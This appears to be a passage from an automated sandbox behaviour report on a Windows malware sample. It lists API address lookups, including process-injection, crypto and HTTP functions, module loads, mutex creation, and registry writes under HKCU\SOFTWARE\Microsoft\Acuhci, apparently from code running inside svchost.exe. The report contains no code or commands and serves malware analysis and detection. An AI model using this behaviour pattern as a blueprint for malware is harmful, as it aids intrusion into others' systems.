| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileW, address_out = 0x759d89b3 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x77cf1f6e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x759e10b5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x759d34d5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x77cde026 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapDestroy, address_out = 0x759d35b7 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAllocEx, address_out = 0x759ed9b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x759d2d3c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x77ce45f5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameW, address_out = 0x759ddd0e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x759d14e9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SystemTimeToFileTime, address_out = 0x759d5a7e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalMemoryStatusEx, address_out = 0x759fd4c4 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x759d103d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x759d170d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedIncrement, address_out = 0x759d1400 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTime, address_out = 0x759d5a96 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFreeEx, address_out = 0x759ed9c8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsBadReadPtr, address_out = 0x759fd075 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiW, address_out = 0x759ed5cd |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OpenMutexW, address_out = 0x759d5151 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetEndOfFile, address_out = 0x759ece2e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThread, address_out = 0x759d17ec |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x759d469b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = RemoveVectoredExceptionHandler, address_out = 0x77d25f41 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x759d1809 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x759d1b00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExW, address_out = 0x759d1ae5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DuplicateHandle, address_out = 0x759d1886 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x759d1245 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = AddVectoredExceptionHandler, address_out = 0x77d2742b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x759d7a10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x759d11f8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileW, address_out = 0x759f830d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiA, address_out = 0x759d3e8e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsWow64Process, address_out = 0x759d195e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstChangeNotificationW, address_out = 0x759ed851 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindNextChangeNotification, address_out = 0x759f5c1e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessInJob, address_out = 0x759fc7ea |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateRemoteThread, address_out = 0x75a5416b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateNamedPipeW, address_out = 0x75a5414b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DisconnectNamedPipe, address_out = 0x75a541df |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ConnectNamedPipe, address_out = 0x75a540fb |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalDrives, address_out = 0x759d5371 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeW, address_out = 0x759d418b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultUILanguage, address_out = 0x759d44ab |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x759f3b92 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableW, address_out = 0x759d1b48 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x759d17d1 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSection, address_out = 0x77ce2c42 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeZoneInformation, address_out = 0x759d465a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x759d192e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFileAttributesW, address_out = 0x759ed4f7 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeNameForVolumeMountPointW, address_out = 0x759e052f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x759d1986 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileTime, address_out = 0x759d4407 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ReleaseMutex, address_out = 0x759d111e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77cd2270 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x759d4950 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFileTime, address_out = 0x759eecbb |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = RemoveDirectoryW, address_out = 0x75a544cf |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x759d1856 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExpandEnvironmentStringsW, address_out = 0x759d4173 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x759d1282 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x759d54ee |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x77cd22b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileAttributesW, address_out = 0x759d1b18 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x759d4442 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OpenEventW, address_out = 0x759d15d6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTempPathW, address_out = 0x759ed4dc |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x759d11a9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x759d14c9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapCreate, address_out = 0x759d4a2d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WriteProcessMemory, address_out = 0x759ed9e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSizeEx, address_out = 0x759d59e2 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x759d4435 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedExchange, address_out = 0x759d1462 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeInformationW, address_out = 0x759ec860 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x759d3ed3 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryW, address_out = 0x759d4259 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x759d34c8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x759d34b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x759d1222 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryW, address_out = 0x759d492b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Process32FirstW, address_out = 0x759f8baf |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Process32NextW, address_out = 0x759f896c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x759d11c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x759f735f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x759d3f5c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateMutexW, address_out = 0x759d424c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ResetEvent, address_out = 0x759d16dd |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x759d1410 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetEvent, address_out = 0x759d16c5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x759d10ff |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventW, address_out = 0x759d183e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x759d1136 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WaitForMultipleObjects, address_out = 0x759d4220 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x759d110c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x759d186e |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetIconInfo, address_out = 0x758e49ea |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DrawIcon, address_out = 0x758e8deb |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = LoadImageW, address_out = 0x758dfbd1 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetCursorPos, address_out = 0x758e1218 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x77ce25dd |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x758d8a29 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = UnregisterClassW, address_out = 0x758d9f84 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetKeyboardLayoutList, address_out = 0x758e2e69 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = CharLowerA, address_out = 0x758e3e75 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = CharToOemW, address_out = 0x75931a26 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x758d7809 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = PeekMessageW, address_out = 0x758e05ba |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x758d787b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = MsgWaitForMultipleObjects, address_out = 0x758e0b4a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x758db17d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = SetWindowLongA, address_out = 0x758e6110 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetWindowLongA, address_out = 0x758dd156 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = CharUpperW, address_out = 0x758df350 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x758d9a55 |
|
1 | |
| Module | Load | module_name = CRYPT32.dll, base_address = 0x76240000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\crypt32.dll, function = CryptImportPublicKeyInfo, address_out = 0x76256c0e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\crypt32.dll, function = CryptDecodeObjectEx, address_out = 0x7624d718 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x7775469d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetAce, address_out = 0x777545f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptEncrypt, address_out = 0x7776779b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthorityCount, address_out = 0x77750e0c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = AllocateAndInitializeSid, address_out = 0x777540e6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthority, address_out = 0x77750e24 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetEntriesInAclW, address_out = 0x77752a66 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyExW, address_out = 0x777540fe |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptVerifySignatureW, address_out = 0x7774c54a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetNamedSecurityInfoW, address_out = 0x77749fe2 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetNamedSecurityInfoW, address_out = 0x7774f4fd |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptCreateHash, address_out = 0x7774df4e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptHashData, address_out = 0x7774df36 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityDescriptorSacl, address_out = 0x77754680 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x777514d6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyHash, address_out = 0x7774df66 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = OpenProcessToken, address_out = 0x77754304 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = FreeSid, address_out = 0x7775412e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = InitializeSecurityDescriptor, address_out = 0x77754620 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x7775468d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptImportKey, address_out = 0x7774c532 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = ConvertStringSecurityDescriptorToSecurityDescriptorW, address_out = 0x77751f59 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = OpenThreadToken, address_out = 0x7775432c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x777546ad |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x7774e124 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetTokenInformation, address_out = 0x7775431c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyKey, address_out = 0x7774c51a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = AdjustTokenPrivileges, address_out = 0x7775418e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityDescriptorDacl, address_out = 0x7775415e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetSecurityDescriptorSacl, address_out = 0x77754608 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = LookupPrivilegeValueW, address_out = 0x777541b3 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetLengthSid, address_out = 0x7775413b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegDeleteValueW, address_out = 0x7774cf31 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegFlushKey, address_out = 0x7776773f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegNotifyChangeKeyValue, address_out = 0x7774e15b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryInfoKeyW, address_out = 0x777546e7 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegEnumKeyW, address_out = 0x7775445b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = InitiateSystemShutdownExW, address_out = 0x7779db3a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextW, address_out = 0x7774df14 |
|
1 | |
| Module | Load | module_name = SHELL32.dll, base_address = 0x76a70000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteW, address_out = 0x76a83c71 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x76a91e46 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76af5708 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathFileExistsW, address_out = 0x763845bf |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsURLW, address_out = 0x763855bf |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsDirectoryEmptyW, address_out = 0x763acd81 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrCmpNIW, address_out = 0x76384745 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathRenameExtensionW, address_out = 0x763ad32a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrStrIW, address_out = 0x763846e9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathMatchSpecW, address_out = 0x763886f7 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathCombineW, address_out = 0x7638c39c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathRemoveFileSpecW, address_out = 0x76383248 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathAddBackslashW, address_out = 0x7638c177 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = wvnsprintfW, address_out = 0x763b066c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathUnquoteSpacesW, address_out = 0x76385331 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathSkipRootW, address_out = 0x7639fbf5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathFindExtensionW, address_out = 0x7638a1b9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = SHDeleteValueW, address_out = 0x7637fcca |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = wvnsprintfA, address_out = 0x7639edfe |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsDirectoryW, address_out = 0x7637ff07 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathRemoveBackslashW, address_out = 0x76385c62 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = UrlUnescapeA, address_out = 0x7639c6fb |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathQuoteSpacesW, address_out = 0x763ace21 |
|
1 | |
| Module | Load | module_name = PSAPI.DLL, base_address = 0x75ad0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\psapi.dll, function = GetModuleFileNameExW, address_out = 0x75ad13f0 |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x75ae0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CLSIDFromString, address_out = 0x75afe599 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoInitializeEx, address_out = 0x75b209ad |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CreateStreamOnHGlobal, address_out = 0x75b0363b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoSetProxyBlanket, address_out = 0x75af5ea5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstance, address_out = 0x75b29d0b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoUninitialize, address_out = 0x75b286d3 |
|
1 | |
| Module | Load | module_name = GDI32.dll, base_address = 0x76950000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = DeleteObject, address_out = 0x76965689 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = GetDeviceCaps, address_out = 0x76964de0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = CreateDCW, address_out = 0x7696e743 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleDC, address_out = 0x769654f4 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = SelectObject, address_out = 0x76964f70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleBitmap, address_out = 0x76965f49 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = BitBlt, address_out = 0x76965ea6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = DeleteDC, address_out = 0x769658b3 |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x75f20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetConnectA, address_out = 0x75f449e9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetReadFile, address_out = 0x75f3b406 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpQueryInfoA, address_out = 0x75f3a33e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetQueryOptionA, address_out = 0x75f31b56 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpOpenRequestA, address_out = 0x75f44c7d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetCrackUrlA, address_out = 0x75f2d075 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetSetOptionA, address_out = 0x75f375e8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenA, address_out = 0x75f4f18e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetCloseHandle, address_out = 0x75f3ab49 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpSendRequestA, address_out = 0x75fb18f8 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x76690000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\urlmon.dll, function = ObtainUserAgentString, address_out = 0x766c1d76 |
|
1 | |
| Module | Load | module_name = OLEAUT32.dll, base_address = 0x761b0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = 9, address_out = 0x761b3eae |
|
1 | |
| Module | Load | module_name = Secur32.dll, base_address = 0x75690000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\secur32.dll, function = GetUserNameExW, address_out = 0x7582a415 |
|
1 | |
| System | Get Info | type = Operating System |
|
2 | |
| Module | Get Filename | process_name = c:\windows\syswow64\svchost.exe, file_name_orig = C:\Windows\SysWOW64\svchost.exe, size = 260 |
|
1 | |
| Mutex | Create | mutex_name = 20BC29E135FB9B01285187E3B5593CC8 |
|
1 | |
| Mutex | Create | mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, size = 1776, type = REG_BINARY |
|
1 | |
| Mutex | Release | mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE |
|
1 | |
| Mutex | Create | mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Temp\azuqkihi, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Temp\xekeov, type = file_attributes |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
